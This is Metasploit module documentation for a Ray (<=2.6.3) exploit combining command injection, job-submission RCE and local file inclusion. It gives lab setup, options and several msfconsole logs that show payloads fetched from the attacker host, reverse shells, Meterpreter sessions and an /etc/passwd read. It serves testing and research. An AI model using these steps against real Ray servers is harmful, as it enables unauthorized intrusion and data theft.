adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4e99e7dfe7b682a0154d4fc8ec49e6a0f4e2a2c8
metasploit-gs/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md
T
Takah1ro b7e4247d22 Avoid using CVE as option
2024-08-07 08:43:57 +09:00

8.3 KiB
Raw Blame History

Vulnerable Application

Ray (<=v2.6.3) is vulnerable to three vulnerabilities:

* RCE via cpu_profile command injection vulnerability (CVE-2023-6019)
* RCE via the agent job submission endpoint (No CVE)
* local file inclusion (CVE-2023-6020)

This module exploits all three vulnerabilities.

The vulnerability affects:

* Ray (<=v2.6.3)

This module was successfully tested on:

* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

Install and run the vulnerable Ray (v2.6.3)

  1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
  2. Install Kali Linux (or other Linux distro) in your virtualization engine.
  3. Pull pre-built Ray docker container (v2.6.3) in your VM. docker pull rayproject/ray:2.6.3
  4. Start the ray container. docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3
  5. Start ray. ray start --head --dashboard-host=0.0.0.0

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/ray_cmdi_rce_lfi
  4. Do: set rhost <rhost>
  5. Optional: set rport <port>
  6. Do: set lhost <attacker-ip>
  7. Optional: set CVE <cve>
  8. Do: run
  9. You should get a shell or meterpreter

Options

ATTACK (required)

This is the attack type to use. Default is CMDi(CVE-2023-6019). but RCE(No CVE) and LFI(CVE-2023-6020) can also be chosen.

COMMAND (Optional)

This is the command to execute. Default is echo 'Hello from Metasploit'. This is used when ATTACK is set to CMDi or RCE.

FILEPATH (Optional)

This is the file to read. Default is /etc/passwd. This is used when ATTACK is set to LFI.

Scenarios

Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0)

msf6 > use exploit/linux/http/ray_cmdi_rce_lfi
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019
cve => CVE-2023-6019
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0
target => 0
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Grabbed node info, pid: 124, ip: 172.17.0.2
[+] Command execution seems to have been successful. Status code: 500
[*] Using URL: http://192.168.56.1:8080/VvzBBm8
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1)

msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019
cve => CVE-2023-6019
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1
target => 1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Grabbed node info, pid: 124, ip: 172.17.0.2
[+] Command execution seems to have been successful. Status code: 500
[*] Using URL: http://192.168.56.1:8080/tMBeDO
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

whoami
ray
pwd
/home/ray

Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0)

msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE 
cve => RCE
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0
target => 0
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN'
[*] Using URL: http://192.168.56.1:8080/roy19E
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (38 bytes) to 192.168.56.6
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray

Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1)

msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE
cve => RCE
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1
target => 1
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy'
[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray

Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020)

msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020
cve => CVE-2023-6020
msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
Reference in New Issue View Git Blame Copy Permalink